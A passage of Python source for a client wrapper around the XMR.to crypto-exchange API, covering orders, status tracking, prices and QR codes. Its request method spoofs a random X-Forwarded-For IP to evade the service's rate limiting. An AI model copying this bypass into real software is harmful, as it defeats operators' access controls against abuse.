- `xmrto_wrapper create-order --destination 3K1jSVxYqzqj7c9oLKXC7uJnwgACuTEZrY --btc-amount 0.001`
- `xmrto_wrapper create-order --destination 3K1jSVxYqzqj7c9oLKXC7uJnwgACuTEZrY --btc-amount 0.001` --follow
- `xmrto_wrapper track-order --secret-key xmrto-ebmA9q`
- `xmrto_wrapper track-order --secret-key xmrto-ebmA9q` --follow
- `xmrto_wrapper check-price --btc-amount 0.01`
- `xmrto_wrapper parameters`
- `xmrto_wrapper qrcode --data "something"`
* Get help
- xmrto_wrapper -h
* You can
- Create an order: `xmrto_wrapper create-order`
- Track an order: `xmrto_wrapper track-order`
- Get a recent price: `xmrto_wrapper price`
- Create a QR code: `xmrto_wrapper qrcode`
* The default API used is `--api v3`, so no need to actually set that parameter.
* The default URL used is `--url https://xmr.to`, so no need to actually set that parameter.
When called as python script python `xmrto_wrapper` configure it using cli options.
When importing as module `import xmrto_wrapper` environment variables are considered.
XMR.to HTTP errors and status codes;
* https://xmrto-api.readthedocs.io/en/latest/
"""
import os
import sys
import argparse
import logging
import json
import time
import collections
import re
from typing import List, Dict
from dataclasses import dataclass
from types import SimpleNamespace
import urllib.parse as urlparse
from requests import Session, codes
from requests.adapters import HTTPAdapter
from requests.exceptions import ConnectionError, SSLError, RequestException
from .rand_ip import get_random_ip_address
logging.basicConfig()
logger = logging.getLogger("XmrtoWrapper")
logger.setLevel(logging.INFO)
API_VERSIONS_ = {
"v3": "v3",
}
API_VERSIONS = SimpleNamespace(**API_VERSIONS_)
XMRTO_URL_DEFAULT = "https://xmr.to"
API_VERSION_DEFAULT = API_VERSIONS.v3
XMRTO_URL = os.environ.get("XMRTO_URL", XMRTO_URL_DEFAULT)
API_VERSION = os.environ.get("API_VERSION", API_VERSION_DEFAULT)
DESTINATION_ADDRESS = os.environ.get("BTC_ADDRESS", None)
LN_INVOICE = os.environ.get("LN_INVOICE", None)
BTC_AMOUNT = os.environ.get("BTC_AMOUNT", None)
XMR_AMOUNT = os.environ.get("XMR_AMOUNT", None)
CERTIFICATE = os.environ.get("XMRTO_CERTIFICATE", None)
QR_DATA = os.environ.get("QR_DATA", None)
SECRET_KEY = os.environ.get("SECRET_KEY", None)
@dataclass
class StatusAttributes:
state: str = "state"
out_amount: str = "btc_amount"
out_amount_partial: str = "btc_amount_partial"
out_address: str = "btc_dest_address"
seconds_till_timeout: str = "seconds_till_timeout"
created_at: str = "created_at"
# Difference between API versions.
in_out_rate: str = "xmr_price_btc"
payment_subaddress: str = "xmr_receiving_subaddress"
in_amount: str = "xmr_amount_total"
in_amount_remaining: str = "xmr_amount_remaining"
in_confirmations_remaining: str = "xmr_num_confirmations_remaining"
# @dataclass
# class StatusAttributesV2(StatusAttributes):
# # Only with API v2.
# payment_address: str = "xmr_receiving_address"
# payment_integrated_address: str = "xmr_receiving_integrated_address"
# payment_id_long: str = "xmr_required_payment_id_long"
# payment_id_short: str = "xmr_required_payment_id_short"
@dataclass
class StatusAttributesV3(StatusAttributes):
in_out_rate: str = "incoming_price_btc"
payment_subaddress: str = "receiving_subaddress"
in_amount: str = "incoming_amount_total"
in_amount_remaining: str = "remaining_amount_incoming"
in_confirmations_remaining: str = "incoming_num_confirmations_remaining"
# Only with API v3.
uses_lightning: str = "uses_lightning"
payments: str = "payments"
@dataclass
class Status:
state: str = ""
out_amount: float = 0.0
out_amount_partial: float = 0.0
out_address: str = ""
seconds_till_timeout: int = 0
created_at: str = ""
# Difference between API versions.
in_out_rate: float = 0.0
payment_subaddress: str = ""
in_amount: float = 0.0
in_amount_remaining: float = 0.0
in_confirmations_remaining: int = 0
# @dataclass
# class StatusV2(Status):
# # Only with API v2.
# payment_address: str = ""
# payment_integrated_address: str = ""
# payment_id_long: str = ""
# payment_id_short: str = ""
# attributes = StatusAttributesV2()
@dataclass
class StatusV3(Status):
out_amount: str = "0.0"
out_amount_partial: str = "0.0"
in_out_rate: str = "0.0"
in_amount: str = "0.0"
in_amount_remaining: str = "0.0"
uses_lightning: bool = False
payments: List[Dict] = None
attributes = StatusAttributesV3()
@dataclass
class OrderAttributes:
uuid: str = "uuid"
state: str = "state"
out_address: str = "btc_dest_address"
out_amount: str = "btc_amount"
@dataclass
class OrderAttributesV3(OrderAttributes):
# Only with API v3.
uses_lightning: str = "uses_lightning"
@dataclass
class Order:
uuid: str = ""
state: str = ""
out_amount: float = 0.0
out_address: str = ""
# @dataclass
# class OrderV2(Order):
# attributes = OrderAttributes()
@dataclass
class OrderV3(Order):
uses_lightning: bool = False
attributes = OrderAttributesV3()
PRICE_FIELDS = ("out_amount", "in_amount", "in_out_rate")
Price = collections.namedtuple("Price", PRICE_FIELDS)
@dataclass
class PriceAttributes:
out_amount: str = "btc_amount"
# @dataclass
# class PriceAttributesV2(PriceAttributes):
# in_amount: str = "xmr_amount_total"
# in_out_rate: str = "xmr_price_btc"
# in_num_confirmations_remaining: str = "xmr_num_confirmations_remaining"
@dataclass
class PriceAttributesV3(PriceAttributes):
in_amount: str = "incoming_amount_total"
in_out_rate: str = "incoming_price_btc"
in_num_confirmations_remaining: str = (
"incoming_num_confirmations_remaining"
)
@dataclass
class Price:
def _to_json(self):
data = {PriceAttributes.out_amount: self.out_amount}
return data
def __str__(self):
return json.dumps(self._to_json())
# @dataclass
# class PriceV2(Price):
# out_amount: float = 0.0
# in_amount: float = 0.0
# in_out_rate: float = 0.0
# in_num_confirmations_remaining: int = -1
# attributes = PriceAttributesV2()
#
# def _to_json(self):
# data = super()._to_json()
# data.update({PriceAttributesV2.in_amount: self.in_amount})
# data.update({PriceAttributesV2.in_out_rate: self.in_out_rate})
# data.update(
# {
# PriceAttributesV2.in_num_confirmations_remaining: self.in_num_confirmations_remaining
# }
# )
# return data
#
# def __str__(self):
# return json.dumps(self._to_json())
@dataclass
class PriceV3(Price):
out_amount: str = "0.0"
xmr_amount: str = "0.0"
in_out_rate: str = "0.0"
in_num_confirmations_remaining: int = -1
attributes = PriceAttributesV3()
def _to_json(self):
data = super()._to_json()
data.update({PriceAttributesV3.in_amount: self.in_amount})
data.update({PriceAttributesV3.in_out_rate: self.in_out_rate})
data.update(
{
PriceAttributesV3.in_num_confirmations_remaining: self.in_num_confirmations_remaining
}
)
return data
def __str__(self):
return json.dumps(self._to_json())
@dataclass
class RoutesAttributes:
num_routes: str = "num_routes"
success_probability: str = "success_probability"
@dataclass
class Routes:
num_routes: int = 0
success_probability: float = 0.0
attributes = RoutesAttributes()
@dataclass
class ParametersAttributes:
price: str = "price"
upper_limit: str = "upper_limit"
lower_limit: str = "lower_limit"
zero_conf_max_amount: str = "zero_conf_max_amount"
zero_conf_enabled: bool = "zero_conf_enabled"
# @dataclass
# class ParametersAttributesV2(ParametersAttributes):
# pass
@dataclass
class ParametersAttributesV3(ParametersAttributes):
ln_upper_limit: str = "ln_upper_limit"
ln_lower_limit: str = "ln_lower_limit"
@dataclass
class Parameters:
zero_conf_enabled: bool = False
def _to_json(self):
data = {ParametersAttributes.zero_conf_enabled: self.zero_conf_enabled}
return data
def __str__(self):
return json.dumps(self._to_json())
# @dataclass
# class ParametersV2(Parameters):
# price: float = 0.0
# upper_limit: float = 0.0
# lower_limit: float = 0.0
# zero_conf_max_amount: float = 0.0
# attributes = ParametersAttributesV2()
#
# def _to_json(self):
# data = super()._to_json()
# data.update({ParametersAttributesV2.price: self.price})
# data.update({ParametersAttributesV2.upper_limit: self.upper_limit})
# data.update({ParametersAttributesV2.lower_limit: self.lower_limit})
# data.update(
# {
# ParametersAttributesV2.zero_conf_max_amount: self.zero_conf_max_amount
# }
# )
# return data
#
# def __str__(self):
# return json.dumps(self._to_json())
@dataclass
class ParametersV3(Parameters):
price: str = "0.0"
upper_limit: str = "0.0"
lower_limit: str = "0.0"
ln_upper_limit: str = "0.0"
ln_lower_limit: str = "0.0"
zero_conf_max_amount: str = "0.0"
attributes = ParametersAttributesV3()
def _to_json(self):
data = super()._to_json()
data.update({ParametersAttributesV3.price: self.price})
data.update({ParametersAttributesV3.upper_limit: self.upper_limit})
data.update({ParametersAttributesV3.lower_limit: self.lower_limit})
data.update(
{ParametersAttributesV3.ln_upper_limit: self.ln_upper_limit}
)
data.update(
{ParametersAttributesV3.ln_lower_limit: self.ln_lower_limit}
)
data.update(
{
ParametersAttributesV3.zero_conf_max_amount: self.zero_conf_max_amount
}
)
return data
def __str__(self):
return json.dumps(self._to_json())
# PARAMETERS_FIELDS = ("price", "upper_limit", "lower_limit", "ln_upper_limit", "ln_lower_limit", "zero_conf_enabled", "zero_conf_max_amount")
# Parameters = collections.namedtuple("Parameters", PARAMETERS_FIELDS)
class XmrtoConnection:
USER_AGENT = "XmrtoProxy/0.1"
HTTP_TIMEOUT = 30
MAX_RETRIES = 3
retry_adapter = HTTPAdapter(max_retries=MAX_RETRIES)
def __init__(self, url="", connection=None, timeout: int = HTTP_TIMEOUT):
self.__url = ""
self.__timeout = timeout
if connection:
logger.debug("Use existing session.")
self.__conn = connection
else:
logger.debug("Create new session.")
self.__url = urlparse.urlparse(url)
headers = {
"Content-Type": "application/json",
"User-Agent": self.USER_AGENT,
"Host": self.__url.hostname,
}
self.__conn = Session()
self.__conn.mount(
f"{self.__url.scheme}://{self.__url.hostname}",
self.retry_adapter,
)
self.__conn.headers = headers
def get_connection(self):
return self.__conn
def get_hostname(self):
return self.__url.hostname
def get(self, url: str, expect_json=True):
return self._request(url=url, func=self._get, expect_json=expect_json)
def _get(self, url: str, **kwargs):
return self.__conn.get(url=url, timeout=self.__timeout, **kwargs)
def post(
self,
url: str,
postdata: Dict[str, str],
expect_json=True,
expect_response=True,
):
return self._request(
url=url,
func=self._post,
postdata=postdata,
expect_json=expect_json,
expect_response=expect_response,
)
def _post(self, url: str, postdata: str, **kwargs):
logger.debug(f"--> POSTDATA: {postdata}.")
logger.debug(f"--> Additional request arguments: '{kwargs}'.")
return self.__conn.post(
url=url,
data=postdata,
timeout=self.__timeout,
**kwargs, # , allow_redirects=False
)
def _request(
self,
url: str,
func,
postdata: Dict[str, str] = None,
expect_json=True,
expect_response=True,
):
"""Makes the HTTP request"""
url = url.lower()
if url.find("localhost") < 0:
schema = re.compile("http[s]?://")
if not schema.match(
url
): # 'match' starts at the begining of the line.
url = "https://" + url
http = re.compile("http://")
if http.match(url): # 'match' starts at the begining of the line.
url = url.replace("http", "https")
logger.debug(f"--> URL: {url}")
response = None
retries = 10
try:
try:
data = {"url": url}
if postdata:
data["postdata"] = json.dumps(postdata)
while retries > 0:
# Get around endpoint rate limit
# by setting a random IP in 'X-Forwarded-For'.
# Naive approach.
if (
response is not None
and response.status_code == codes.forbidden
):
logger.info(f"[{retries}] Rate limited, trying again.")
retries -= 1
random_ip = get_random_ip_address()
# 'X-Forwarded-For' is added
# in addition to the session headers.
# https://requests.readthedocs.io/en/master/user/advanced/
data["headers"] = {"X-Forwarded-For": random_ip}
response = func(**data)
logger.debug(f"--> METHOD: {response.request.method}.")
logger.debug(
f"--> REQUEST HEADERS: {response.request.headers}."
)
logger.debug(f"<-- STATUS CODE: {response.status_code}.")
logger.debug(f"<-- RESPONE HEADERS: {response.headers}.")
if response.status_code != codes.forbidden:
retries = 0
except (SSLError) as e:
# Disable verification: verify=False
# , cert=path_to_certificate
# , verify=True
logger.debug(
f"Trying certificate: '{CERTIFICATE}'. SSL certificate error '{str(e)}'."
)
data["cert"] = CERTIFICATE
data["verify"] = True
response = func(**data)
except (ConnectionError) as e:
logger.debug(f"Connection error: {str(e)}.")
error_msg = {"error": str(e)}
error_msg["url"] = url
error_msg["error_code"] = 102
logger.error(json.dumps(error_msg))
return error_msg
except (RequestException) as e:
logger.debug(f"Request error: {str(e)}.")
error_msg = {"error": str(e)}
error_msg["url"] = url
error_msg["error_code"] = 104
logger.error(json.dumps(error_msg))
return error_msg
except (Exception) as e:
logger.debug(f"Error: {str(e)}.")
error_msg = {"error": str(e)}
error_msg["url"] = url
error_msg["error_code"] = 103
logger.error(json.dumps(error_msg))
return error_msg
response_ = None
try:
response_ = self._get_response(
response=response, expect_json=expect_json
)
except (ValueError) as e:
logger.debug(f"Error: {str(e)}.")
error_msg = {"error": json.loads(str(e))}
error_msg["url"] = url
error_msg["error_code"] = 100
logger.error(f"Response error: {json.dumps(error_msg)}.")
return error_msg
if not response_:
if expect_response:
error_msg = {"error": "Could not evaluate response."}
error_msg["url"] = url
error_msg["error_code"] = 101
logger.error(f"No response: {json.dumps(error_msg)}.")
else:
error_msg = {}
logger.debug(
f"No response: {json.dumps(error_msg)}. No response expected, ignored."
)
return error_msg
elif isinstance(response_, dict) and (
not response_.get("error", None) is None
):
error_msg = response_
error_msg["url"] = url
logger.error(f"API error: {json.dumps(error_msg)}.")
return error_msg
return response_
def _get_response(self, response, expect_json=True):
"""Evaluate HTTP request response
:return: Either JSON response or response object in case of PNG (QRCode)
"""
json_response = None
# Compare against None
# Response with 400 status code returns True for not response
if response is None:
json_response = {
"error": "No response.",
"error_msg": f"Response is {response}.",
}
if not json_response:
# Error codes used by the API, returning API errors.
if response.status_code not in (
codes.ok,
codes.created, # Order created.
codes.bad, # Invalid post parameters.
codes.forbidden, # Rate limit.
codes.not_found, # Order not found.
):
json_response = {
"error": "HTTP status code.",
"error_msg": f"Received HTTP status code: {response.status_code}.",
}
if not json_response:
http_response = response.text
if http_response is None:
json_response = {
"error": "Empty response.",
"error_msg": "Missing HTTP response from server.",
}
if not json_response:
try:
json_response = response.json()
except (json.decoder.JSONDecodeError) as e:
if expect_json:
if response.status_code in (
codes.not_found, # General 'not found', e.g. API endpoint not found.
):
json_response = {
"error": "HTTP status code.",
"error_msg": f"Received HTTP status code: {response.status_code}.",
}
else:
json_response = {
"error": "Expected JSON, got something else.",
"error_msg": str(e),
"response": http_response,
}
else:
return http_response
logger.debug(f"<-- {json_response}")
return json_response
class CreateOrder:
api_classes = {API_VERSIONS.v3: OrderV3}
@classmethod
def get(cls, data, api):
xmrto_error = None
if data and "error" in data:
xmrto_error = data
order_ = cls.api_classes[api]
if not order_ or data is None:
return None, xmrto_error
order = order_()
order.uuid = data.get(order.attributes.uuid, None)
order.state = data.get(order.attributes.state, None)
order.out_address = data.get(order.attributes.out_address, None)
order.out_amount = data.get(order.attributes.out_amount, None)
if api == API_VERSIONS.v3:
order.uses_lightning = data.get(
order.attributes.uses_lightning, None
)
return order, xmrto_error
class OrderStatus:
api_classes = {API_VERSIONS.v3: StatusV3}
@classmethod
def get(cls, data, api):
xmrto_error = None
if data and "error" in data:
xmrto_error = data
status_ = cls.api_classes[api]
if not status_ or data is None:
return None, xmrto_error
status = status_()
status.state = data.get(status.attributes.state, None)
status.in_out_rate = data.get(status.attributes.in_out_rate, None)
status.out_amount = data.get(status.attributes.out_amount, None)
status.out_amount_partial = data.get(
status.attributes.out_amount_partial, None
)
status.out_address = data.get(status.attributes.out_address, None)
status.in_confirmations_remaining = data.get(
status.attributes.in_confirmations_remaining, None
)
status.in_amount_remaining = data.get(
status.attributes.in_amount_remaining, None
)
status.in_amount = data.get(status.attributes.in_amount, None)
status.payment_subaddress = data.get(
status.attributes.payment_subaddress, None
)
status.seconds_till_timeout = data.get(
status.attributes.seconds_till_timeout, None
)
status.created_at = data.get(status.attributes.created_at, None)
if api == API_VERSIONS.v3:
status.uses_lightning = data.get(
status.attributes.uses_lightning, None
)
status.payments = data.get(status.attributes.payments, None)
return (
status,
xmrto_error,
)
class CheckPrice:
api_classes = {API_VERSIONS.v3: PriceV3}
@classmethod
def get(cls, data, api):
xmrto_error = None
if data and "error" in data:
xmrto_error = data
price_ = cls.api_classes[api]
if not price_ or data is None:
return None, xmrto_error
price = price_()
price.out_amount = data.get(price.attributes.out_amount, None)
price.in_amount = data.get(price.attributes.in_amount, None)
price.in_out_rate = data.get(price.attributes.in_out_rate, None)
price.in_num_confirmations_remaining = data.get(
price.attributes.in_num_confirmations_remaining, None
)
return (
price,
xmrto_error,
)
class CheckRoutes:
api_classes = {API_VERSIONS.v3: Routes}
@classmethod
def get(cls, data, api):
xmrto_error = None
if data and "error" in data:
xmrto_error = data
routes_ = cls.api_classes[api]
if not routes_ or data is None:
return None, xmrto_error
routes = routes_()
routes.num_routes = data.get(routes.attributes.num_routes, None)
routes.success_probability = data.get(
routes.attributes.success_probability, None
)
return (
routes,
xmrto_error,
)
class CheckParameters:
api_classes = {
API_VERSIONS.v3: ParametersV3,
}
@classmethod
def get(cls, data, api):
xmrto_error = None
if data and "error" in data:
xmrto_error = data
parameters_ = cls.api_classes[api]
if not parameters_ or data is None:
return None, xmrto_error
parameters = parameters_()
parameters.price = data.get(parameters.attributes.price, None)
parameters.upper_limit = data.get(
parameters.attributes.upper_limit, None
)
parameters.lower_limit = data.get(
parameters.attributes.lower_limit, None
)
parameters.zero_conf_enabled = data.get(
parameters.attributes.zero_conf_enabled, None
)
parameters.zero_conf_max_amount = data.get(
parameters.attributes.zero_conf_max_amount, None
)
if api == API_VERSIONS.v3:
parameters.ln_upper_limit = data.get(
parameters.attributes.ln_upper_limit, None
)
parameters.ln_lower_limit = data.get(
parameters.attributes.ln_lower_limit, None
)
return (
parameters,
xmrto_error,
)
class CheckQrCode:
@classmethod
def get(cls, data, api):
return data
class XmrtoApi:
CREATE_ORDER_ENDPOINT = "/api/{api_version}/xmr2btc/order_create/"
CREATE_LN_ORDER_ENDPOINT = "/api/{api_version}/xmr2btc/order_create_ln/"
ORDER_STATUS_ENDPOINT = "/api/{api_version}/xmr2btc/order_status_query/"
CHECK_PRICE_ENDPOINT = "/api/{api_version}/xmr2btc/order_check_price/"
CHECK_LN_ROUTES_ENDPOINT = (
"/api/{api_version}/xmr2btc/order_ln_check_route/"
)
CHECK_PARAMETERS_ENDPOINT = (
"/api/{api_version}/xmr2btc/order_parameter_query/"
)
PARTIAL_PAYMENT_ENDPOINT = (
"/api/{api_version}/xmr2btc/order_partial_payment/"
)
QRCODE_ENDPOINT = "/api/{api_version}/xmr2btc/gen_qrcode"
def __init__(
self,
url=XMRTO_URL_DEFAULT,
api=API_VERSION_DEFAULT,
connection=None,
):
self.url = url[:-1] if url.endswith("/") else url
self.api = api
self.__xmr_conn = XmrtoConnection(url=self.url, connection=connection)
def get_connection(self):
return self.__xmr_conn
def __add_amount_and_currency(self, out_amount=None, currency=None):
additional_api_keys = {}
amount_key = "btc_amount"
if self.api == API_VERSIONS.v3:
amount_key = "amount"
additional_api_keys["amount_currency"] = currency
additional_api_keys[f"{amount_key}"] = str(out_amount)
return additional_api_keys
def create_order(self, out_address=None, out_amount=None, currency="BTC"):
if out_address is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--destination', see 'python xmrto-wrapper.py -h'.",
}
return None, error
if out_amount is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--btc-amount' or '--xmr-amount', see 'python xmrto-wrapper.py -h'.",
}
return None, error
create_order_url = self.url + self.CREATE_ORDER_ENDPOINT.format(
api_version=self.api
)
postdata = {"btc_dest_address": out_address}
postdata.update(
self.__add_amount_and_currency(
out_amount=out_amount, currency=currency
)
)
response = self.__xmr_conn.post(
url=create_order_url, postdata=postdata
)
return CreateOrder.get(data=response, api=self.api)
def create_ln_order(self, ln_invoice=None):
if ln_invoice is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--invoice', see 'python xmrto-wrapper.py -h'.",
}
return None, error
create_order_url = self.url + self.CREATE_LN_ORDER_ENDPOINT.format(
api_version=self.api
)
postdata = {"ln_invoice": ln_invoice}
response = self.__xmr_conn.post(
url=create_order_url, postdata=postdata
)
return CreateOrder.get(data=response, api=self.api)
def order_status(self, uuid=None):
if uuid is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--secret-key', see 'python xmrto-wrapper.py -h'.",
}
return None, error
order_status_url = self.url + self.ORDER_STATUS_ENDPOINT.format(
api_version=self.api
)
postdata = {"uuid": uuid}
response = self.__xmr_conn.post(
url=order_status_url, postdata=postdata
)
return OrderStatus.get(data=response, api=self.api)
def confirm_partial_payment(self, uuid=None):
if uuid is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--secret-key', see 'python xmrto-wrapper.py -h'.",
}
return False, error
partial_payment_url = self.url + self.PARTIAL_PAYMENT_ENDPOINT.format(
api_version=self.api
)
postdata = {"uuid": uuid}
response = self.__xmr_conn.post(
url=partial_payment_url,
postdata=postdata,
expect_json=False,
expect_response=False,
)
xmrto_error = None
confirmed = True
if response and "error" in response:
xmrto_error = response
confirmed = False
if response is None:
return False, xmrto_error
return confirmed, xmrto_error
def order_check_price(
self, btc_amount=None, xmr_amount=None, currency="BTC"
):
if btc_amount is None and xmr_amount is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument --'btc-amount' or '--xmr-amount', see 'python xmrto-wrapper.py -h'.",
}
return None, error
order_check_price_url = self.url + self.CHECK_PRICE_ENDPOINT.format(
api_version=self.api
)
if btc_amount:
currency = "BTC"
out_amount = btc_amount
elif xmr_amount:
currency = "XMR"
out_amount = xmr_amount
postdata = {}
postdata.update(
self.__add_amount_and_currency(
out_amount=out_amount, currency=currency
)
)
response = self.__xmr_conn.post(
url=order_check_price_url, postdata=postdata
)
return CheckPrice.get(data=response, api=self.api)
def order_check_ln_routes(self, ln_invoice=None):
logger.debug(ln_invoice)
if ln_invoice is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--invoice', see 'python xmrto-wrapper.py -h'.",
}
return None, error
order_check_ln_routes_url = (
self.url
+ self.CHECK_LN_ROUTES_ENDPOINT.format(api_version=self.api)
)
query_param = f"?ln_invoice={ln_invoice}"
response = self.__xmr_conn.get(
url=order_check_ln_routes_url + query_param
)
return CheckRoutes.get(data=response, api=self.api)
def order_check_parameters(self):
order_check_parameters_url = (
self.url
+ self.CHECK_PARAMETERS_ENDPOINT.format(api_version=self.api)
)
response = self.__xmr_conn.get(url=order_check_parameters_url)
return CheckParameters.get(data=response, api=self.api)
def generate_qrcode(self, data=None):
if data is None:
return None
generate_qrcode_url = (
self.url
+ self.QRCODE_ENDPOINT.format(api_version=self.api)
+ f"/?data={data}"
)
response = self.__xmr_conn.get(
url=generate_qrcode_url, expect_json=False
)
return CheckQrCode.get(data=response, api=self.api)
class OrderStateType(type):
def __new__(cls, *args):
x = super().__new__(cls, *args)
x.TO_BE_CREATED = "TO_BE_CREATED"
x.UNPAID = "UNPAID"
x.UNDERPAID = "UNDERPAID"
x.PAID_UNCONFIRMED = "PAID_UNCONFIRMED"
x.BTC_SENT = "BTC_SENT"
x.TIMED_OUT = "TIMED_OUT"
x.PURGED = "PURGED"
x.FLAGGED_DESTINATION_ADDRESS = "FLAGGED_DESTINATION_ADDRESS"
x.PAYMENT_FAILED = "PAYMENT_FAILED"
x.REJECTED = "REJECTED"
return x
class XmrtoOrderStatus:
def __init__(
self,
url=XMRTO_URL_DEFAULT,
api=API_VERSION_DEFAULT,
uuid=None,
connection=None,
):
self.url = url[:-1] if url.endswith("/") else url
self.api = api
self.xmrto_api = XmrtoApi(
url=self.url, api=self.api, connection=connection
)
self.uuid = uuid
self.order_status = None
self.error = None
self.in_amount = None
self.in_amount_remaining = None
self.in_out_rate = None
self.out_amount = None
self.out_amount_partial = None
self.out_address = None
self.payment_subaddress = None
self.seconds_till_timeout = None
self.created_at = None
self.in_confirmations_remaining = None
self.payments = None
self.uses_lightning = None
self.state = XmrtoOrder.TO_BE_CREATED
def get_order_status(self, uuid=None):
if uuid is None:
uuid = self.uuid
else:
self.uuid = uuid
if not all([self.url, self.api, self.uuid]):
logger.error("Please check the arguments.")
self.order_status, self.error = self.xmrto_api.order_status(uuid=uuid)
if self.order_status:
self.state = self.order_status.state
self.in_amount = self.order_status.in_amount
self.in_amount_remaining = self.order_status.in_amount_remaining
self.in_out_rate = self.order_status.in_out_rate
self.out_amount = self.order_status.out_amount
self.out_amount_partial = self.order_status.out_amount_partial
self.out_address = self.order_status.out_address
self.payment_subaddress = self.order_status.payment_subaddress
self.seconds_till_timeout = self.order_status.seconds_till_timeout
self.created_at = self.order_status.created_at
self.in_confirmations_remaining = (
self.order_status.in_confirmations_remaining
)
if self.api == API_VERSIONS.v3:
self.payments = self.order_status.payments
self.uses_lightning = self.order_status.uses_lightning
return True
def confirm_partial_payment(self, uuid=None):
self.get_order_status(uuid=uuid)
if self.error:
return False
(
partial_payment_confirmed,
self.error,
) = self.xmrto_api.confirm_partial_payment(uuid=self.uuid)
return partial_payment_confirmed
def _to_json(self):
data = {}
if self.uuid:
data.update({OrderAttributesV3.uuid: self.uuid})
if self.state:
data.update({OrderAttributesV3.state: self.state})
if self.out_address:
data.update({StatusAttributesV3.out_address: self.out_address})
if self.out_amount:
data.update({StatusAttributesV3.out_amount: self.out_amount})
if self.payment_subaddress:
data[
StatusAttributesV3.payment_subaddress
] = self.payment_subaddress
if self.in_amount:
data[StatusAttributesV3.in_amount] = self.in_amount
if self.in_amount_remaining:
data[
StatusAttributesV3.in_amount_remaining
] = self.in_amount_remaining
if self.in_out_rate:
data[StatusAttributesV3.in_out_rate] = self.in_out_rate
if self.out_amount:
data[StatusAttributesV3.out_amount] = self.out_amount
if self.out_amount_partial:
data[
StatusAttributesV3.out_amount_partial
] = self.out_amount_partial
if self.seconds_till_timeout:
data[
StatusAttributesV3.seconds_till_timeout
] = self.seconds_till_timeout
if self.created_at:
data[StatusAttributesV3.created_at] = self.created_at
if (
self.in_confirmations_remaining
and self.in_confirmations_remaining > 0
):
data[
StatusAttributesV3.in_confirmations_remaining
] = self.in_confirmations_remaining
if self.payments:
data.update({StatusAttributesV3.payments: self.payments})
if self.uses_lightning is not None:
data.update(
{StatusAttributesV3.uses_lightning: self.uses_lightning}
)
if self.error:
data["error"] = self.error
return data
def __str__(self):
return json.dumps(self._to_json())
class XmrtoOrder(metaclass=OrderStateType):
def __init__(
self,
url=XMRTO_URL_DEFAULT,
api=API_VERSION_DEFAULT,
out_address=None,
btc_amount=None,
xmr_amount=None,
connection=None,
):
self.url = url[:-1] if url.endswith("/") else url
self.api = api
self.xmrto_api = XmrtoApi(
url=self.url, api=self.api, connection=connection
)
self.order = None
self.order_status = None
self.error = None
self.out_address = out_address
self.btc_amount = btc_amount
self.btc_amount_partial = None
self.xmr_amount = xmr_amount
self.out_amount = None
self.currency = None
self.uuid = None
self.in_amount = None
self.in_amount_remaining = None
self.in_out_rate = None
self.payment_subaddress = None
self.uses_lightning = None
self.state = XmrtoOrder.TO_BE_CREATED
def create_order(
self,
out_address=None,
btc_amount=None,
xmr_amount=None,
currency="BTC",
):
if out_address is None:
out_address = self.out_address
else:
self.out_address = out_address
if btc_amount is None:
btc_amount = self.btc_amount
else:
self.btc_amount = btc_amount
if xmr_amount is None:
xmr_amount = self.xmr_amount
else:
self.xmr_amount = xmr_amount
if not any([self.btc_amount, self.xmr_amount]):
logger.debug(
f"out amount: '{self.btc_amount}', in amount '{self.xmr_amount}'."
)
logger.error("Please check the arguments.")
if not all([self.url, self.api, self.out_address]):
logger.debug(f"destination address: '{self.out_address}'.")
logger.error("Please check the arguments.")
out_amount = self.btc_amount
if btc_amount:
currency = "BTC"
out_amount = self.btc_amount
elif xmr_amount:
currency = "XMR"
out_amount = self.xmr_amount
self.currency = currency
logger.debug(
f"transfer '{self.btc_amount}' [{currency}] to '{self.out_address}'."
)
self.order, self.error = self.xmrto_api.create_order(
out_address=self.out_address,
out_amount=out_amount,
currency=currency,
)
if self.order:
self.uuid = self.order.uuid
self.state = self.order.state
self.out_amount = self.order.out_amount
self.out_address = self.order.out_address
if self.api == API_VERSIONS.v3:
self.uses_lightning = self.order.uses_lightning
def get_order_status(self, uuid=None):
if uuid is None:
uuid = self.uuid
if self.error:
return 1
self.order_status = XmrtoOrderStatus(
url=self.url,
api=self.api,
connection=self.xmrto_api.get_connection().get_connection(),
)
self.order_status.get_order_status(uuid=uuid)
if self.order_status:
self.state = self.order_status.state
self.in_amount = self.order_status.in_amount
self.in_amount_remaining = self.order_status.in_amount_remaining
self.in_out_rate = self.order_status.in_out_rate
self.out_amount = self.order_status.out_amount
self.btc_amount_partial = self.order_status.out_amount_partial
self.payment_subaddress = self.order_status.payment_subaddress
if self.api == API_VERSIONS.v3:
self.payments = self.order_status.payments
self.uses_lightning = self.order.uses_lightning
self.error = self.order_status.error
def _to_json(self):
data = {}
if self.uuid:
data.update({OrderAttributesV3.uuid: self.uuid})
if self.state:
data.update({OrderAttributesV3.state: self.state})
if self.out_address:
data.update({OrderAttributesV3.out_address: self.out_address})
if self.out_amount:
data.update({OrderAttributesV3.out_amount: self.out_amount})
if self.uses_lightning is not None:
data.update(
{OrderAttributesV3.uses_lightning: self.uses_lightning}
)
if self.order_status:
data.update(self.order_status._to_json())
if self.error:
data.update(self.error)
return data
def __str__(self):
return json.dumps(self._to_json())
class XmrtoLnOrder(XmrtoOrder):
def __init__(
self,
url=XMRTO_URL_DEFAULT,
api=API_VERSION_DEFAULT,
ln_invoice=None,
connection=None,
):
super().__init__(url=url, api=api, connection=connection)
self.ln_invoice = ln_invoice
def create_order(self, ln_invoice=None):
if ln_invoice is None:
ln_invoice = self.ln_invoice
else:
self.ln_invoice = ln_invoice
if not all([self.url, self.api, self.ln_invoice]):
logger.debug(f"{self.ln_invoice}")
logger.error("Please check the arguments.")
logger.debug(f"{self.ln_invoice}")
self.order, self.error = self.xmrto_api.create_ln_order(
ln_invoice=self.ln_invoice
)
if self.order:
self.uuid = self.order.uuid
self.state = self.order.state
self.out_amount = self.order.out_amount
self.out_address = self.order.out_address
def create_order(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
out_address=DESTINATION_ADDRESS,
btc_amount=BTC_AMOUNT,
xmr_amount=XMR_AMOUNT,
connection=None,
):
order = XmrtoOrder(
url=xmrto_url,
api=api_version,
out_address=out_address,
